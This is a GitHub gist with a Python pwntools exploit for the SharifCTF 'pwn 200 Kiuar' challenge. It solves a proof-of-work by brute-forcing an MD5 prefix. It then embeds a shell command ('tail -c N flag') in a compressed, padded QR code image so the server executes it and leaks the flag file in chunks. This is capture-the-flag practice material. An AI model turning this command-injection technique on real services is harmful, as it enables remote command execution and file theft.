Skip to content

Instantly share code, notes, and snippets.

@djekmani
Last active February 7, 2016 19:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save djekmani/c749b35c20320f1bd37e to your computer and use it in GitHub Desktop.
Save djekmani/c749b35c20320f1bd37e to your computer and use it in GitHub Desktop.
SharifCTF pwn 200 Kiuar
from pwn import *
from hashlib import *
import zlib
import qrcode
# context.log_level = 'debug'
#task: telnet ctf.sharif.edu 12432
HOST = "ctf.sharif.edu"
PORT = 12432
def create_qrcode(cmd):
qr = qrcode.QRCode(version = 1 ,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size = 1,
border = 1
)
qr.add_data(cmd)
qr.make(fit=True)
img = qr.make_image()
f = open("Qr-cmd.png" , 'w+')
img.save(f , 'png')
f.close()
img = open('Qr-cmd.png' , 'r')
data = img.read()
img.close()
data = zlib.compress(data , zlib.Z_BEST_COMPRESSION)
data = pad_img(data)
return data
def get_binary(line):
start = 67
return line[start:start+22]
def get_integer(bin_prefix):
for i in xrange(1000000000,10000000000000000):
if(bin(int(md5(hex(i)[2:]).hexdigest(),16))[2:24] == bin_prefix):
return [hex(i)[2:] , md5(hex(i)[2:]).hexdigest()]
return False
def pad_img(img):
img += "\x90"*(200-len(img))
return img
def get_chunk():
chunk = [19, 36]
flag = ''
for i in chunk:
cnx = remote(HOST , PORT)
cmd = "tail -c " +str(i)+ " flag"
data = create_qrcode(cmd)
print "[+] Qr-code compressed Zlib image created"
line = cnx.recvline_startswith('Give' , True)
cnx.recv()
prefix = get_binary(line)
print "[+] prefix: "+ prefix
print "[+] Bruteforcing md5 hash"
[integer , md5] = get_integer(prefix)
print "[+] integer is: "+ integer
print "[+] md5 hash is: "+ md5
print "[+] Sending the integer"
cnx.send(integer)
resp = cnx.recvuntil('T')
print "[+] Sending compressed image"
cnx.send(data)
resp = cnx.recv()
print "[+] Chunk leaked: "+resp[103:] + "\n"
flag = resp[103:] + flag
return 'SharifCT' + flag
#THE MAIN
flag = get_chunk()
print "[+] The final flag is: "+ flag
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment